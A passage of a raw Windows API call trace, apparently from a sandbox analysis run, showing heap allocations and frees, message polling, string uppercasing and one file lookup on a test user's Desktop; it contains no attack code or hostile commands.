[0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.349] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.355] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/yvFiHqzM6fmTt.flv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab1f10, ftCreationTime.dwHighDateTime=0x1d4d0ed, ftLastAccessTime.dwLowDateTime=0x2ebd11d0, ftLastAccessTime.dwHighDateTime=0x1d4cc80, ftLastWriteTime.dwLowDateTime=0x2ebd11d0, ftLastWriteTime.dwHighDateTime=0x1d4cc80, nFileSizeHigh=0x0, nFileSizeLow=0xbeb2, dwReserved0=0xb450006, dwReserved1=0x10143, cFileName="yvFiHqzM6fmTt.flv", cAlternateFileName="YVFIHQ~1.FLV")) returned 0xaa58e0 [0190.355] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.357] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0190.357] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.358] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.358] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.358] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.358] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.359] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.359] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 